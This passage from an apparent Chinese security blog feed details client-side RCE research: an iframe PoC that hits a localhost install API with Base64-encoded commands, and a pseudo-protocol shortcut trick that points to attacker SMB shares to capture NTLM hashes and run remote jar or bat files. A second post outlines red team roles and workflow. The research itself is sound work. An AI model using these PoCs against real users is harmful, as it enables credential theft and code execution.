      \u5728IDA\u4e2d\u8ddf\u8fdb\u51fd\u6570004203B0<\/code>\uff0c\u5b83\u5b9e\u9645\u4e0a\u4e5f\u662f\u8c03\u7528\u7684\u53e6\u5916\u4e00\u4e2a\u51fd\u657000370C70<\/code>\uff0c\u5728\u8be5\u51fd\u6570\u91cc\u5bf9\u5b57\u7b26\u4e32\u8fdb\u884c\u4f4d\u79fb\u8f6c\u6362\uff0c\u731c\u6d4b\u53ef\u80fd\u662f\u81ea\u5b9a\u4e49\u7684\u89e3\u7801\u65b9\u5f0f\u3002\u4f46\u662f\u5728\u5b83\u8fdb\u884c\u904d\u5386\u7684\u8fc7\u7a0b\u4e2d\u4f7f\u7528\u5230\u4e86\u4e00\u6bb5\u6570\u7ec4\u6570\u636eword_74E940<\/code>\uff0c\u6211\u4eec\u8ddf\u8fdb\u8fd9\u4e2a\u6570\u636e\u4e4b\u540e\u53d1\u73b0\u4f3c\u4e4e\u662f\u4e00\u5f20\u89e3\u7801\u8868\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u5982\u4e0b\u5c06\u6574\u6bb5\u6570\u636e\u7f57\u5217\u51fa\u6765\uff0c\u770b\u7740\u4e0eBase64\u89e3\u7801\u6240\u9700\u8981\u7684\u89e3\u7801\u8868\u662f\u4e00\u81f4\u7684\uff0c\u6240\u4ee5\u6b64\u5904\u6781\u6709\u53ef\u80fd\u5c31\u662fBase64\u89e3\u7801\u64cd\u4f5c\uff0c\u5c06\u6211\u4eec\u7684\u8f93\u5165\u7684\u5b57\u7b26\u4e32cmd.exe<\/code>\u8fdb\u884c\u89e3\u7801\uff0c\u6700\u7ec8\u5c31\u53d8\u6210\u4e86\u4e71\u7801\u3002<\/p>\n\n
      \u6211\u4eec\u53ef\u4ee5\u5c06cmd.exe<\/code>\u5b57\u7b26\u4e32\u8fdb\u884cBase64\u89e3\u7801\uff0c\u53d1\u73b0\u7ed3\u679c\u786e\u5b9e\u4e3a\u6211\u4eec\u4e4b\u524d\u6240\u770b\u5230\u7684\u4e71\u7801\u5185\u5bb9\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u6700\u7ec8\u6211\u4eec\u4e5f\u5c31\u786e\u5b9a\u4e86\u8fd9\u91cc\u7684\u8bf7\u6c42\u53c2\u6570\u503c\u662f\u9700\u8981\u5148\u8fdb\u884cBase64\u7f16\u7801\u4e4b\u540e\u518d\u5e26\u5165\u8bf7\u6c42\u7684\u3002\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u6784\u5efa\u51fa\u5982\u4e0bExploit\uff0c\u5f53\u5b89\u88c5\u4e86\u8be5\u5ba2\u6237\u7aef\u7684\u5e94\u7528\u6253\u5f00Exp\u4ee3\u7801\u5bf9\u5e94\u9875\u9762\u65f6\uff0c\u5373\u53ef\u4ee5\u6267\u884c\u6211\u4eec\u60f3\u8981\u7684\u547d\u4ee4\u3002<\/p>\n\n
      <iframe src=\"http:\/\/127.0.0.1:38230\/api_install?file=Y21kLmV4ZQ==&param=L2sgbm90ZXBhZA==\" width=\"0px\" height=\"0px\">\n<\/code><\/pre>\n\n
      \"\"<\/p>\n\n
      \u67d0\u89c6\u9891\u8f6f\u4ef6\u5ba2\u6237\u7aef<\/h5>\n\n
      \u901a\u8fc7URLProtocolView\u627e\u5230\u89c6\u9891\u8f6f\u4ef6\u5ba2\u6237\u7aef\u6ce8\u518c\u7684\u4f2a\u534f\u8bae\uff1axxplayer:\/\/<\/code>\uff0c\u901a\u8fc7\u5b57\u7b26\u4e32\u5b9a\u4f4d\u7a0b\u5e8f\u4f2a\u534f\u8bae\u7684\u5904\u7406\u529f\u80fd\u70b9\uff0c\u4e5f\u53ef\u4ee5\u77e5\u9053\u6709\u54ea\u4e9b\u7684\u4f2a\u534f\u8bae\u8def\u7531\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \"\"<\/p>\n\n
      \u53d1\u73b0\u8fd9\u91cc\u53ef\u4ee5\u901a\u8fc7xxplayer:\/\/action.cmd\/xxx<\/code>\u7684\u65b9\u5f0f\u6765\u89e6\u53d1\u4e00\u4e9b\u529f\u80fd\uff0c\u6240\u6709\u529f\u80fd\u5217\u8868\u5982\u4e0b\u6240\u793a\uff1a<\/p>\n\n
      xxplayer:\/\/action.cmd\/playShareVideo\nxxplayer:\/\/action.cmd\/play\nxxplayer:\/\/action.cmd\/downloadvideo\nxxplayer:\/\/action.cmd\/downloadpage\nxxplayer:\/\/action.cmd\/downloadShareVideo\nxxplayer:\/\/action.cmd\/createshortcut_url\nxxplayer:\/\/action.cmd\/createshortcut\nxxplayer:\/\/action.cmd\/activeHomepage\n<\/code><\/pre>\n\n
      \u6839\u636e\u5b57\u9762\u610f\u601d\u7406\u89e3\u5b83\u7684\u4f5c\u7528\u5373\u53ef\uff0c\u8fd9\u91cc\u6211\u4eec\u4e00\u4e2a\u4e00\u4e2a\u5e26\u5165\u8bf7\u6c42\u5c1d\u8bd5\uff0c\u53d1\u73b0\u5f53\u8bf7\u6c42createshortcut_url<\/code>\u65f6\u4f1a\u5728\u684c\u9762\u521b\u5efa.link<\/code>\u7684\u5feb\u6377\u65b9\u5f0f\u6587\u4ef6\u3002<\/p>\n\n
      \u6211\u4eec\u8ddf\u8fdb\u8fd9\u4e2a\u521b\u5efa\u5feb\u6377\u65b9\u5f0f\u7684\u903b\u8f91\uff0c\u53d1\u73b0\u5b9e\u9645\u4e0a\u5b83\u8fd8\u6709\u4e24\u4e2a\u53c2\u6570\uff1aurl<\/code>\u3001name<\/code>\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u7136\u540e\u5c06\u8fd9\u4e24\u4e2a\u53c2\u6570\u503c\u5e26\u5165CreateUrlShortcut<\/code>\u51fd\u6570\u6267\u884c\uff0c\u8fd9\u4e2a\u51fd\u6570\u662f\u5bfc\u5165\u51fd\u6570\uff0c\u5c31\u662f\u7528\u4e8e\u521b\u5efa\u684c\u9762\u5feb\u6377\u65b9\u5f0f\u7684\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u6784\u5efa\u4f2a\u534f\u8baeURL\uff1axxplayer:\/\/action.cmd\/createshortcut_url?url=http:\/\/www.baidu.com&name=Test<\/code>\uff0c\u8bbf\u95ee\u5c31\u53d1\u73b0\u5b83\u521b\u5efa\u4e86\u4e00\u4e2a\u540d\u4e3aTest<\/code>\u7684\u5feb\u6377\u65b9\u5f0f\uff0c\u76ee\u6807\u4e3a\uff1aC:\\xxplayer.exe \\UrlQuickLunch=http:\/\/www.baidu.com,0<\/code>\uff0c\u4e5f\u5c31\u8868\u793a\u6211\u4eec\u4f20\u5165\u7684url<\/code>\u53c2\u6570\u503c\u53d8\u6210\u4e86\u542f\u52a8\u53c2\u6570\uff0cname<\/code>\u53c2\u6570\u503c\u53d8\u6210\u4e86\u5feb\u6377\u65b9\u5f0f\u540d\u5b57\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u5f53\u6211\u4eec\u53cc\u51fb\u8fd9\u4e2a\u5feb\u6377\u65b9\u5f0f\u65f6\uff0c\u5c31\u4f1a\u8c03\u7528\u6d4f\u89c8\u5668\u6253\u5f00http:\/\/www.baidu.com<\/code>\u3002<\/p>\n\n
      \u63a5\u7740\u6211\u4eec\u53d1\u73b0\u53ea\u8981url<\/code>\u53c2\u6570\u503c\u4e3axxx:\/\/xxx.xxx\/<\/code>\u7684\u683c\u5f0f\u5373\u53ef\uff0c\u90a3\u4e48\u6211\u4eec\u5c1d\u8bd5\u5c06url<\/code>\u53c2\u6570\u503c\u4fee\u6539\u4e3afile:\/\/172.16.176.176\/netntlm<\/code>\uff0c\u4e5f\u5c31\u53d8\u6210\u8fd9\u6837\uff1axxplayer:\/\/action.cmd\/createshortcut_url?url=file:\/\/172.16.176.176\/netntlm&name=123<\/code>\uff0c\u5728\u673a\u5668\u4e0aresponder<\/code>\u76d1\u542c\u4e00\u4e0b\uff0c\u5f53\u6253\u5f00\u5feb\u6377\u65b9\u5f0f\u65f6\u6536\u5230\u4e86NTLM Hash\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u9664\u4e86\u83b7\u53d6NTLM Hash\uff0c\u6211\u4eec\u8fd8\u53ef\u4ee5\u5728Ubuntu\u4e0a\u5f00\u4e00\u4e2aSMB\u670d\u52a1\uff0c\u7136\u540e\u5c06url<\/code>\u53c2\u6570\u8bbe\u4e3a\u4f7f\u7528\\\\172.16.176.176\\share\\Test.exe<\/code>\uff0c\u4f7f\u7528\u5feb\u6377\u65b9\u5f0f\u6253\u5f00\u5171\u4eab\u6587\u4ef6\uff0c\u53d1\u73b0\u786e\u5b9e\u53ef\u4ee5\u6253\u5f00EXE\u6587\u4ef6\uff0c\u4f46\u662f\u4f1a\u6709\u6587\u4ef6\u4fe1\u4efb\u7684\u5b89\u5168\u8b66\u544a\uff08Mark-of-the-Web\uff09\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u8fd9\u91cc\u53ef\u4ee5\u901a\u8fc7jar<\/code>\u6587\u4ef6\u5f62\u5f0f\u53bb\u7ed5\u8fc7\uff0c\u6253\u5305\u4e00\u4e2a\u6253\u5f00\u8ba1\u7b97\u5668\u7684Jar\u5305\u653e\u5728\u5171\u4eab\u76ee\u5f55\u4e0b\uff0c\u7136\u540e\u5c06url<\/code>\u53c2\u6570\u8bbe\u4e3a\u4f7f\u7528\\\\172.16.176.176\\share\\1.jar<\/code>\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u8bbf\u95eexxplayer:\/\/action.cmd\/createshortcut_url?url=\\\\172.16.176.225\\share\\1.jar&name=123<\/code>\uff0c\u521b\u5efa\u5feb\u6377\u65b9\u5f0f\uff0c\u6253\u5f00\u5feb\u6377\u65b9\u5f0f\uff0c\u6267\u884cJar\u5305\u542f\u52a8\u8ba1\u7b97\u5668\uff0c\u8fd9\u6837\u6211\u4eec\u5c31\u5b9e\u73b0\u4e861 Click\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u4f7f\u7528\u8fdc\u7a0bJar\u5305\u7684\u65b9\u5f0f\u6765\u8fbe\u5230\u4efb\u610f\u547d\u4ee4\u6267\u884c\u8fd8\u662f\u6709\u5c40\u9650\u6027\uff0c\u5982\u679c\u76ee\u6807\u673a\u5668\u4e0d\u5b58\u5728Java\u73af\u5883\u5c31\u65e0\u6cd5\u6267\u884c\uff0c\u56e0\u6b64\u5728\u5bf9\u6587\u4ef6\u4fe1\u4efb\u673a\u5236\u7684\u7814\u7a76\u53d1\u73b0\u5728smb<\/code>\u5171\u4eab\u6587\u4ef6\u4e2d\u6253\u5f00zip<\/code>\u538b\u7f29\u5305\u5185\u7684bat<\/code>\u6587\u4ef6\uff0c\u4e0d\u4f1a\u6709\u4efb\u4f55\u5f39\u7a97\u63d0\u793a\u76f4\u63a5\u6267\u884cbat<\/code>\u6587\u4ef6\u5185\u5bb9\u3002<\/p>\n\n
      \u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u5728\u5171\u4eab\u6587\u4ef6\u5939\u4e2d\u521b\u5efa1.zip<\/code>\uff0c\u653e\u5165\u5185\u5bb9\u4e3acalc<\/code>\u76841.bat<\/code>\u6587\u4ef6\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u5c06url<\/code>\u53c2\u6570\u503c\u8bbe\u4e3a\\\\172.16.176.225\\share\\1.zip\\1.bat<\/code>\uff0c\u7136\u540e\u8bbf\u95eexxplayer:\/\/action.cmd\/createshortcut_url?url=\\\\172.16.176.225\\share\\1.zip\\1.bat&name=123<\/code>\u521b\u5efa\u684c\u9762\u5feb\u6377\u65b9\u5f0f\uff0c\u6253\u5f00\u5feb\u6377\u65b9\u5f0f\u5373\u53ef\u6267\u884cbat<\/code>\u6587\u4ef6\uff0c\u6700\u7ec8\u8fbe\u5230\u4e0d\u9700\u8981\u4efb\u4f55\u4f9d\u8d56\u7684\u60c5\u51b5\u4e0b\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u603b\u7ed3<\/h2>\n\n
      \u7b80\u5355\u603b\u7ed3\u4e00\u4e0b\u4ee5\u4e0a\u4e24\u7c7b\u5ba2\u6237\u7aef\u7684\u653b\u51fb\u5165\u53e3\u3001RCE\u98ce\u9669\u548c\u5f71\u54cd\u9762\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \"\"<\/p>\n\n
      \u5173\u4e8e\u5ba2\u6237\u7aef\u672c\u5730\u5f00\u542f\u7684\u7f51\u7edc\u534f\u8bae\u95ee\u9898\uff0c\u6211\u603b\u7ed3\u51fa\u5982\u4e0b\u51e0\u6b65\u53ef\u4ee5\u5feb\u901f\u7684\u8fdb\u884c\u6f0f\u6d1e\u53d1\u73b0:<\/p>\n\n
        \n  
      1. \u627e\u5230\u5ba2\u6237\u7aef\u542f\u52a8\u7684\u672c\u5730\u7f51\u7edc\u670d\u52a1\uff08TCP\u3001UDP\uff09\uff0c\u8fd9\u4e2a\u53ef\u4ee5\u7528\u706b\u7ed2\u5251\u6216\u8005CMD\u7684\u65b9\u5f0f\u67e5\u770b\uff1b<\/li>\n  
      2. \u6709\u672c\u5730\u76d1\u542c\u7684\u60c5\u51b5\u4e0b\uff0c\u627e\u5230\u5bf9\u5e94\u7684\u7a0b\u5e8f\u4ee5\u53ca\u52a0\u8f7d\u7684DLL\uff0c\u901a\u8fc7IDA\u6839\u636e\u7aef\u53e3\u53f7\u627e\u5230\u76d1\u542c\u7684\u70b9\uff0c\u5982\u679c\u662fC\/C++\u7684\u7a0b\u5e8f\u4e00\u822c\u627ebind\u8fd9\u4e2a\u51fd\u6570\u5c31\u80fd\u5feb\u901f\u5b9a\u4f4d\u5230\uff1b<\/li>\n  
      3. \u5411\u4e0a\u56de\u6eaf\u627e\u8c03\u7528\u94fe\uff0c\u5e76\u6839\u636e\u7f51\u7edc\u670d\u52a1\u7684\u8fd4\u56de\u7ed3\u679c\uff0c\u4f8b\u5982HTTP\u8bbf\u95ee\u4f1a\u6709\u4e00\u6bb5\u5b57\u7b26\u4e32\u6216\u8005\u54cd\u5e94\u5934\u7684\u4e00\u4e9b\u5b57\u7b26\u4e32\uff0c\u5b9a\u4f4d\u5230\u4ee3\u7801\u5904\u7406\u903b\u8f91\uff1b<\/li>\n  
      4. \u5982\u679c\u903b\u8f91\u5bf9\u5e94\u4e0a\u4e86\uff0c\u90a3\u5c31\u63a5\u7740\u627e\u7a0b\u5e8f\u7684\u5bfc\u5165\u8868\u662f\u5426\u5b58\u5728\u654f\u611f\u7684\u51fd\u6570\uff0c\u4f8b\u5982\uff1aCreateProcess\u3001WinExec\u3001ShellExec\uff0c\u5982\u679c\u5b58\u5728\u5219\u53ef\u4ee5\u5411\u4e0a\u56de\u6eaf\u770b\u770b\u662f\u5426\u4e0e\u7f51\u7edc\u670d\u52a1\u76d1\u542c\u70b9\u6709\u8054\u7cfb\uff1b<\/li>\n  
      5. \u5f53\u6761\u4ef6\u90fd\u6ee1\u8db3\u7684\u65f6\u5019\u5c31\u60f3\u5c3d\u529e\u6cd5\uff0c\u901a\u8fc7\u65ad\u70b9\u8c03\u8bd5\u7b49\u64cd\u4f5c\uff0c\u627e\u4f20\u53c2\u6216\u6570\u636e\u4f20\u8f93\u683c\u5f0f\uff0c\u770b\u770b\u53ef\u63a7\u5185\u5bb9\u662f\u5426\u53ef\u8fbe\u654f\u611f\u7684\u51fd\u6570\u5904\uff1b<\/li>\n  
      6. \u6839\u636e\u4ee3\u7801\u903b\u8f91\u6784\u9020PoC\u89e6\u53d1\u6f0f\u6d1e\uff0c\u5e76\u5c1d\u8bd5\u6b66\u5668\u5316\u5229\u7528\u3002<\/li>\n<\/ol>\n\n
        \u81f4\u8c22<\/h2>\n\n
        \u5728\u6587\u7ae0\u7684\u6700\u540e\uff0c\u6211\u8981\u611f\u8c22\u516c\u53f8\u90e8\u95e8\u9886\u5bfc\u548c\u540c\u4e8b\u5bf9\u672c\u8bae\u9898\u7684\u8d21\u732e\u548c\u5e2e\u52a9\uff08\u4ee5\u4e0b\u6392\u540d\u4e0d\u5206\u5148\u540e\uff09\uff0c\u611f\u8c22\u5b57\u8282\u8df3\u52a8\u5b89\u5168\u4e2d\u5fc3\u5bf9\u4e8e\u672c\u6b21\u6c99\u9f99\u7684\u7b79\u529e\u548c\u7b56\u5212\u3002<\/p>\n\n
        \"\"<\/p>\n","pubDate":"2023-12-18T00:00:00+08:00","link":"https:\/\/gh0st.cn\/archives\/2023-12-18\/1","guid":"https:\/\/gh0st.cn\/archives\/2023-12-18\/1"},{"title":"\u6211\u773c\u4e2d\u7684\u7ea2\u961f","description":"
        \u6211\u773c\u4e2d\u7684\u7ea2\u961f<\/h1>\n\n
        \u788e\u8bed\u95f2\u8c08\uff0c\u4f5c\u4e3a\u4e00\u540d\u591a\u5e74\u7684\u5341\u516b\u7ebf\u7ea2\u961f\u9009\u624b\u4e00\u76f4\u60f3\u5199\u4e00\u7bc7\u6587\u7ae0\u6765\u603b\u7ed3\u4e0b\u201c\u6211\u773c\u4e2d\u7684\u7ea2\u961f\u201d\uff0c\u4e4b\u524d\u5199\u8fc7\u4e00\u70b9\uff0c\u56e0\u6587\u7b14\u62d9\u52a3\u9042\u5220\u9664\uff0c\u8d77\u672c\u6587\u91cd\u5199\u3002<\/p>\n\n
        \u4ec0\u4e48\u662f\u7ea2\u961f<\/h2>\n\n
        \u73b0\u5982\u4eca\u662f\u6570\u5b57\u5316\u65f6\u4ee3\uff0c\u4e07\u7269\u8054\u7f51\u521b\u9020\u4e86\u4e00\u4e2a\u65b0\u7684\u7a7a\u95f4\uff0c\u5373\u7f51\u7edc\u7a7a\u95f4\uff0c\u7f51\u7edc\u7a7a\u95f4\u7684\u5b89\u5168\u4e5f\u4e0a\u5347\u5230\u4e86\u56fd\u5bb6\u5b89\u5168\u5c42\u9762\uff0c\u5e76\u4e14\u7f51\u7edc\u5df2\u7ecf\u6210\u4e3a\u56fd\u5bb6\u7ee7\u6d77\u3001\u9646\u3001\u7a7a\u3001\u5929\u4e4b\u540e\u7684\u7b2c\u4e94\u5927\u4e3b\u6743\u9886\u57df\u7a7a\u95f4\u3002<\/p>\n\n
        \u6b63\u662f\u5982\u6b64\uff0c\u7f51\u7edc\u7a7a\u95f4\u4e5f\u5c31\u5982\u4f20\u7edf\u9886\u57df\u7a7a\u95f4\u4e00\u6837\uff0c\u9700\u8981\u901a\u8fc7\u6f14\u4e60\u5bf9\u6297\u7684\u6a21\u5f0f\uff0c\u63d0\u5347\u7f51\u7edc\u5b89\u5168\u9632\u5fa1\u80fd\u529b\uff0c\u4ee5\u653b\u4fc3\u9632\uff0c\u77e5\u653b\u5584\u9632\u3002<\/p>\n\n
        \u653b\u9632\u53cc\u65b9\u5728\u6f14\u4e60\u4e2d\u901a\u5e38\u79f0\u4e4b\u4e3a\u7ea2\u961f\uff08Red Team\uff09\u548c\u84dd\u961f\uff08Blue Team\uff09\uff0c\u7ea2\u961f\uff08Red Team\uff09\u5373\u653b\u51fb\u65b9\uff0c\u7a77\u5c3d\u65b9\u6cd5\u653b\u51fb\u4ee5\u8fbe\u5230\u83b7\u53d6\u6f14\u4e60\u9776\u6807\u6743\u9650\u7684\u76ee\u7684\u3002<\/p>\n\n
        \u7ea2\u961f\u653b\u51fb\u6d41\u7a0b<\/h2>\n\n
        \u7ea2\u961f\u7684\u653b\u51fb\u6d41\u7a0b\u5927\u81f4\u5206\u4e3a4\u4e2a\u6b65\u9aa4\uff0c\u5206\u522b\u662f\u5236\u5b9a\u6218\u672f\u3001\u5916\u7f51\u6253\u70b9\u3001\u5185\u7f51\u6a2a\u5411\u3001\u7ed3\u679c\u62a5\u544a\u3002<\/p>\n\n
        \u5236\u5b9a\u6218\u672f<\/strong>\uff1a\u6839\u636e\u6f14\u4e60\u89c4\u5219\u53ca\u76ee\u6807\u7ed3\u5408\u81ea\u8eab\u4f18\u70b9\u5236\u5b9a\u653b\u51fb\u6218\u672f\uff0c\u4ee5\u4fdd\u8bc1\u6f14\u4e60\u8fc7\u7a0b\u4e0d\u76f2\u76ee\u3001\u4e0d\u6df7\u4e71\uff0c\u6709\u6761\u4e0d\u7d0a\u7684\u5b8c\u6210\u6f14\u4e60\uff1b<\/p>\n\n
        \u5916\u7f51\u6253\u70b9<\/strong>\uff1a\u901a\u8fc7\u6f0f\u6d1e\u3001\u4f9b\u5e94\u94fe\u3001\u793e\u5de5\u3001\u8fd1\u6e90\u7b49\u624b\u6bb5\u5bf9\u76ee\u6807\u66b4\u9732\u9762\u8fdb\u884c\u653b\u51fb\uff0c\u4ee5\u6b64\u6253\u5f00\u8fdb\u5165\u76ee\u6807\u5185\u7f51\u7684\u5165\u53e3\uff1b<\/p>\n\n
        \u5185\u7f51\u6a2a\u5411<\/strong>\uff1a\u901a\u8fc7\u4fe1\u606f\u6536\u96c6\u3001\u5206\u6790\u3001\u5173\u8054\uff0c\u7ed3\u5408\u76f8\u5173\u6f0f\u6d1e\u53ca\u5bc6\u7801\u5bf9\u5185\u7f51\u53ef\u8fbe\u7f51\u6bb5\u673a\u5668\u8fdb\u884c\u6a2a\u5411\u653b\u51fb\uff0c\u4ee5\u6b64\u53d1\u73b0\u66f4\u591a\u8106\u5f31\u70b9\u6216\u63a5\u8fd1\u5185\u7f51\u7684\u6f14\u4e60\u9776\u6807\uff1b<\/p>\n\n
        \u7ed3\u679c\u62a5\u544a<\/strong>\uff1a\u5c06\u7ea2\u961f\u653b\u51fb\u8fc7\u7a0b\u3001\u6240\u6d89\u6280\u672f\u624b\u6bb5\u3001\u653b\u51fb\u75d5\u8ff9\u7b49\u4fe1\u606f\u8fdb\u884c\u6574\u7406\uff0c\u5f62\u6210\u6587\u6863\u63d0\u4ea4\u81f3\u6f14\u4e60\u5e73\u53f0\uff0c\u5e76\u4e14\u4fbf\u4e8e\u540e\u7eed\u590d\u76d8\u3002<\/p>\n\n
        \u7ea2\u961f\u6210\u5458\u7ed3\u6784<\/h2>\n\n
        \u901a\u5e38\u5728\u653b\u9632\u6f14\u4e60\u4e2d\uff0c\u4e3b\u529e\u65b9\u90fd\u662f\u8981\u6c42\u73b0\u573a\u7ea2\u961f\u6210\u5458\u6709\u4e09\u4f4d\uff0c\u6309\u7167\u6211\u7684\u7406\u89e3\u8fd9\u4e09\u4f4d\u5e94\u8be5\u662f\uff1a\u961f\u957f\u3001\u6e17\u900f\u5e08\u3001\u6a2a\u5411\u5e08\u3002<\/p>\n\n
        \u961f\u957f<\/strong>\uff1a\u6280\u672f\u7efc\u5408\u80fd\u529b\u8f83\u5f3a\uff0c\u5177\u5907\u8f83\u597d\u7684\u56e2\u961f\u534f\u4f5c\u3001\u7ec4\u7ec7\u3001\u5e94\u53d8\u3001\u6c9f\u901a\u80fd\u529b\uff0c\u80fd\u6709\u6761\u7406\u7684\u5b89\u6392\u6f14\u4e60\u4efb\u52a1\uff0c\u5e76\u4e14\u5728\u6f14\u4e60\u7ed3\u679c\u4e0a\u62a5\u540e\u6709\u4e89\u8bae\u65f6\u4e0e\u88c1\u5224\u8fdb\u884c\u6c9f\u901a\uff1b<\/p>\n\n
        \u6e17\u900f\u5e08<\/strong>\uff1a\u524d\u6e17\u900f\u80fd\u529b\u8f83\u5f3a\uff0c\u4e5f\u5c31\u662f\u4fa7\u91cd\u4e8e\u4fe1\u606f\u6536\u96c6\u3001Web\u6f0f\u6d1e\u9ed1\u76d2\u6316\u6398\u53ca\u4ee3\u7801\u5ba1\u8ba1\u80fd\u529b\uff0c\u5728\u62ff\u5230\u76ee\u6807\u4fe1\u606f\u540e\u80fd\u591f\u5feb\u901f\u7684\u627e\u5230\u8106\u5f31\u8d44\u4ea7\uff0c\u6495\u5f00\u66b4\u9732\u9762\u5165\u53e3\u4ee5\u4f9b\u540e\u6e17\u900f\uff1b<\/p>\n\n
        \u6a2a\u5411\u5e08<\/strong>\uff1a\u540e\u6e17\u900f\u80fd\u529b\u8f83\u5f3a\uff0c\u4e5f\u5c31\u662f\u4fa7\u91cd\u4e8e\u6728\u9a6c\u514d\u6740\u3001\u6743\u9650\u7ef4\u6301\u53ca\u6f0f\u6d1e\u5229\u7528\u80fd\u529b\uff0c\u5f53\u5177\u6709\u66b4\u9732\u9762\u5165\u53e3\u65f6\u80fd\u591f\u901a\u8fc7\u5b83\u5bf9\u5185\u7f51\u8fdb\u884c\u6301\u7eed\u6027\u7684\u8106\u5f31\u70b9\u53d1\u73b0\u3002<\/p>\n\n
        \u5f53\u7136\uff0c\u76ee\u6807\u5f80\u5f80\u662f\u7f8e\u597d\u7684\uff0c\u73b0\u5b9e\u5374\u662f\u6b8b\u9177\u7684\uff0c\u5728\u6f14\u4e60\u4e2d\u771f\u6b63\u7684\u7ea2\u961f\u6210\u5458\u90fd\u5e94\u8be5\u5177\u5907\u8fd9\u4e09\u79cd\u80fd\u529b\uff0c\u624d\u80fd\u5e94\u5bf9\u8fd9\u4e07\u53d8\u7684\u5c40\u9762\u3002<\/p>\n\n
        \u7ea2\u961f\u57fa\u7840\u8bbe\u65bd<\/h2>\n\n
        \u7ea2\u961f\u7684\u57fa\u7840\u8bbe\u65bd\uff0c\u6211\u5c06\u5176\u5206\u4e3a\u4e09\u5927\u5757\uff1a\u4eba\u5458\u3001\u6b66\u5668\u5e93\u3001\u6f0f\u6d1e\u5e93\u3002<\/p>\n\n
        \u4eba\u5458<\/strong>\uff1a\u4e07\u4e8b\u7686\u4ee5\u4eba\u4e3a\u672c\uff0c\u7ea2\u961f\u7684\u57fa\u7840\u8bbe\u65bd\u4e5f\u79bb\u4e0d\u5f00\u4eba\uff0c\u4f18\u79c0\u7684\u4f19\u4f34\u53ef\u4ee5\u8ba9\u4f60\u5728\u6f14\u4e60\u8fc7\u7a0b\u4e2d\u66f4\u8212\u5fc3\uff0c\u800c\u4eba\u5458\u901a\u5e38\u662f\u6700\u96be\u89e3\u51b3\u7684\uff0c\u5927\u90e8\u5206\u90fd\u662f\u901a\u8fc7\u5916\u90e8\u62db\u8058\u7684\u5f62\u5f0f\u5f15\u5165\u6280\u672f\u4eba\u624d\uff0c\u6216\u57f9\u517b\u521d\u5165\u804c\u573a\u7684\u5b66\u751f\uff1b<\/p>\n\n
        \u6b66\u5668\u5e93<\/strong>\uff1a\u6b66\u5668\u5e93\u5728\u6211\u7684\u7406\u89e3\u4e2d\uff0c\u5c31\u662f\u4e00\u5207\u7686\u81ea\u52a8\u5316\u6216\u81ea\u4e3b\u5316\uff0c\u4fe1\u606f\u6536\u96c6\u3001\u90ae\u4ef6\u9493\u9c7c\u3001\u6728\u9a6c\u514d\u6740\u7684\u81ea\u52a8\u5316\uff0c\u4ee5\u53caC2\u3001Webshell\u7ba1\u7406\u5de5\u5177\u7684\u81ea\u4e3b\u5316\uff0c\u8fd9\u90fd\u662f\u6700\u57fa\u7840\u7684\u4e00\u4e9b\uff1b<\/p>\n\n
        \u6f0f\u6d1e\u5e93<\/strong>\uff1a\u6f0f\u6d1e\u5e93\u53730day\u30011day\u8fd9\u4e9b\u6f0f\u6d1e\u7684\u5229\u7528\uff0c\u4f8b\u5982SQL\u6ce8\u5165\u4e0d\u5e94\u53ea\u662f\u6ce8\u5165\uff0c\u800c\u662f\u8981\u7ed3\u5408SQL\u6ce8\u5165\u76f4\u63a5\u83b7\u53d6\u76ee\u6807\u7ad9\u70b9\u6743\u9650\uff0c\u65e0\u8bba\u4f60\u662f\u7ed3\u5408SQL\u6ce8\u5165\u83b7\u53d6\u5bc6\u7801\u518d\u8fdb\u5165\u540e\u53f0\u8fdb\u884c\u6587\u4ef6\u4e0a\u4f20\u83b7\u53d6\u6743\u9650\uff0c\u8fd8\u662fSQL\u6ce8\u5165\u76f4\u63a5\u5806\u53e0\u6267\u884c\u547d\u4ee4\u83b7\u53d6\u6743\u9650\uff0c\u7b80\u800c\u8a00\u4e4b\uff0c\u6f0f\u6d1e\u53ea\u662f\u5f00\u59cb\uff0c\u901a\u8fc7\u6f0f\u6d1e\u83b7\u53d6\u6743\u9650\u624d\u662f\u6f0f\u6d1e\u5e93\u6240\u9700\u8981\u7684\uff0c\u8fd9\u4e5f\u662f\u5927\u5bb6\u901a\u5e38\u6240\u8bf4\u7684\u6f0f\u6d1e\u6b66\u5668\u5316\u3002<\/p>\n\n
        \u7ea2\u961f\u7ed3\u679c\u590d\u76d8<\/h2>\n\n
        \u5728\u8fdb\u884c\u4e00\u573a\u6f14\u4e60\u4e4b\u540e\uff0c\u7ea2\u961f\u5e94\u7ed3\u5408\u6f14\u4e60\u7ed3\u679c\u8fdb\u884c\u590d\u76d8\uff0c\u4e3b\u8981\u56f4\u7ed5\u8fd9\u51e0\u4e2a\u65b9\u9762\uff1a\u6f14\u4e60\u7ed3\u679c\u7684\u603b\u7ed3\u3001\u7ea2\u961f\u6210\u5458\u7684\u5206\u5de5\u3001\u6f14\u4e60\u8fc7\u7a0b\u7684\u95ee\u9898\u3002<\/p>\n\n
        \u6f14\u4e60\u7ed3\u679c\u7684\u603b\u7ed3<\/strong>\uff1a\u5bf9\u6f14\u4e60\u4e0a\u62a5\u7684\u7ed3\u679c\u8fdb\u884c\u603b\u7ed3\uff0c\u68b3\u7406\u51fa\u653b\u51fb\u6280\u672f\u53ca\u76f8\u5173\u8def\u5f84\uff1b<\/p>\n\n
